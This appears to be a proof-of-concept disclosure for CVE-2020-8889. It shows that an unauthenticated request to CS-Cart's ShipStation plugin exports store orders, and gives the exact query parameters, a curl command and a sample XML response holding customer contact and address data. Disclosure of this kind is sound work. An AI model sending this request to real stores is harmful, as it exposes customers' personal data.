Minimum requirements for CVE-2020-8889

Minimum requirements:

  1. Visit the home page of a CS-Cart store which has the ShipStation plugin 1.0 installed (previously available at https://ss7.shipstation.com/content/integration/CSCart/shipstation_cs-cart_1.0.5.zip but replaced with https://ss7.shipstation.com/content/integration/CSCart/shipstation_cs-cart_1.0.10.zip)
  2. Add the following query string parameters to the store's home page URL (in bold):
    • dispatch=shipstation
    • action=export
    • end_date=2050 (or any future year readable by PHP's strtotime() function)

Example via curl (assuming CS-Cart is installed at http://localhost):

$ curl 'http://localhost/?dispatch=shipstation&action=export&end_date=2050'
<?xml version="1.0" standalone="yes"?>
<Orders pages="2">
  <Order>
    <OrderID><![CDATA[28]]></OrderID>
    <OrderNumber><![CDATA[28]]></OrderNumber>
    <OrderDate><![CDATA[9/25/2013 23:01 PM]]></OrderDate>
    <OrderStatus><![CDATA[complete]]></OrderStatus>
    <LastModified><![CDATA[9/25/2013 23:01 PM]]></LastModified>
    <ShippingMethod><![CDATA[Custom shipping method]]></ShippingMethod>
    <PaymentMethod><![CDATA[1]]></PaymentMethod>
    <OrderTotal><![CDATA[917.99]]></OrderTotal>
    <TaxAmount><![CDATA[0]]></TaxAmount>
    <ShippingAmount><![CDATA[0.00]]></ShippingAmount>
    <CustomerNotes><![CDATA[]]></CustomerNotes>
    <InternalNotes><![CDATA[]]></InternalNotes>
    <Customer>
      <CustomerCode><![CDATA[[email protected]]]></CustomerCode>
      <BillTo>
        <Name><![CDATA[David Tenant]]></Name>
        <Company><![CDATA[]]></Company>
        <Phone><![CDATA[+55(55)5555-5555]]></Phone>
        <Email><![CDATA[[email protected]]]></Email>
      </BillTo>
      <ShipTo>
        <Name><![CDATA[David Tenant]]></Name>
        <Company><![CDATA[]]></Company>
        <Address1><![CDATA[Glasgow, Lanarkshire G2 1DS]]></Address1>
        <Address2><![CDATA[]]></Address2>
        <City><![CDATA[Glasgow]]></City>
        <State><![CDATA[GLAS]]></State>
        <PostalCode><![CDATA[141 332]]></PostalCode>
        <Country><![CDATA[GB]]></Country>
        <Phone><![CDATA[+55(55)5555-5555]]></Phone>
      </ShipTo>
    </Customer>
    <Items>
      <Item>
        <SKU><![CDATA[H0148VPS1T]]></SKU>
        <Name><![CDATA[16GB A Series Walkman Video MP3]]></Name>
        <ImageUrl><![CDATA[http://localhost/images/detailed/0/NWZA865BLK.jpg]]></ImageUrl>
        <Weight><![CDATA[0.000]]></Weight>
        <WeightUnits><![CDATA[lbs]]></WeightUnits>
        <Quantity><![CDATA[1]]></Quantity>
        <UnitPrice><![CDATA[219.00]]></UnitPrice>
        <Location><![CDATA[]]></Location>
      </Item>
    </Items>
  </Order>
</Orders>